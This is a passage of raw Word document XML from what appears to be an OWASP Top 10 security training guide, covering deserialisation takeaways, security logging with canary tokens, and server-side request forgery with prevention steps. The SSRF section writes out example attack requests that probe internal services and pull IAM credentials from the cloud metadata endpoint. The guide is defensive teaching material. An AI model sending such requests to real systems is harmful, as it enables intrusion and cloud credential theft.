              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// NOT: $data = unserialize($_POST['data']);  // dangerous!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A08 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Deserialising untrusted data can lead to full Remote Code Execution (RCE)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Prefer JSON with schema validation over binary serialisation formats</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Never use PHP unserialize() on untrusted input</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Sign and verify all software packages and update payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Pin CI/CD dependency versions and verify their integrity hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A09:2021 — Security Logging and Monitoring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Widespread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Undetected breach / Delayed response</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Without adequate logging and monitoring, attacks go undetected and incidents cannot be investigated effectively. This category covers insufficient logging, missing alerts, logs not being monitored, and the absence of an incident response plan. The average time to detect a breach is over 200 days — largely because logging is inadequate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What Should Be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Event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Information to Log</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Authentication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attempts (success/failure), MFA events, user/IP, timestamp</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Authorisation failures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403 responses, access denied events, resource and user ID</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Input validation failures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inputs that suggest injection attempts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Application errors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Exceptions, stack traces (server-side only, never sent to client)</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Account lifecycle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password change, email change, deletion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 actions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changes, privilege grants, data exports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Canary Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Canary Tokens are free tripwires you can place in your systems to detect attackers. When an attacker accesses a canary token (a specially crafted URL, file, or credential), you receive an alert. They can be embedded in:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Database backup files (a fake admin credential that sends an alert when used)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Source code repositories (a fake API key that triggers on use)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document files (a Word/PDF that phones home when opened)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal web pages (a hidden URL that alerts when accessed externally)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4"/>
              <w:left w:val="single" w:color="856404" w:sz="4"/>
              <w:bottom w:val="single" w:color="856404" w:sz="4"/>
              <w:right w:val="single" w:color="856404" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Canary Tokens</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Free service: https://canarytokens.org</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Generate tokens for: URLs, DNS, HTTP, MySQL, Windows credentials, Office documents, PDF files</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">When the token is triggered, you receive an email or webhook notification with the attacker's IP and timestamp.</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Practical use: embed a fake AWS key in your codebase — if it appears in breach data, you know source code was stolen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Log all authentication, authorisation, and validation events with sufficient context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Store logs in a separate, write-protected system to prevent attackers from erasing them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up alerts for suspicious patterns: multiple failed logins, unusual access times, large data exports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a SIEM (Security Information and Event Management) tool to correlate events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Define and test an incident response plan before an incident occurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Canary Tokens as tripwires throughout your infrastructure</w:t>
      </w:r>
    </w:p>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A09 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Log authentication failures, authorisation denials, and suspicious inputs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Store logs out-of-band from the application (attacker can't modify them)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Set up automated alerts for brute force, anomalous access, and error spikes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Deploy Canary Tokens as tripwires in databases, repos, and documents</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Test your incident response plan — before you need it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A10:2021 — Server-Side Request Forgery (SSRF)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network access / Cloud credential theft / RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF occurs when an application makes HTTP requests to a URL specified or influenced by user input, without validating that the target is safe. An attacker can use this to probe internal services, read cloud metadata APIs, access resources behind firewalls, or pivot to other systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A vulnerable application feature might look like a URL preview generator, webhook configuration, PDF generator, or image downloader — any feature that fetches a user-provided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SSRF attack scenarios</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Vulnerable endpoint: fetches the URL provided by user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=https://example.com/image.png</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Attack: access internal services</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=http://localhost:8080/admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=http://192.168.1.1/router-admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=http://10.0.0.1:6379/  (Redis)</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Attack: steal cloud metadata credentials (AWS, GCP, Azure)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=http://169.254.169.254/latest/meta-data/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/fetch-preview?url=http://169.254.169.254/latest/meta-data/iam/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                security-credentials/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Response contains AWS Access Key ID, Secret Key, and session token!</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 DNS rebinding — bypass SSRF filters by resolving to internal IP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Attacker controls DNS: first resolves to 93.184.216.34 (external)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Then re-resolves to 192.168.1.1 (internal) after check passes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF Impact in Cloud Environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In cloud environments (AWS, GCP, Azure), SSRF is especially dangerous because the instance metadata API (accessible at 169.254.169.254) returns temporary IAM credentials. An attacker who can trigger SSRF can steal these credentials and gain access to any AWS service the instance has permission for.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate and sanitise all user-supplied URLs before making requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a strict allowlist of permitted domains and protocols — deny by default</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolve DNS and validate the resolved IP against an allowlist before connecting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable redirects, or validate each redirect destination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Block requests to loopback (127.0.0.1, ::1), link-local (169.254.0.0/16), and private IP ranges (10.x, 172.16.x, 192.168.x)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In AWS, use IMDSv2 (requires a PUT request with token) which is harder to exploit via SSRF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5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="240"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="240"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF prevention: DNS resolution check before fetch</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// SECURE SSRF mitigation (Node.js example)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
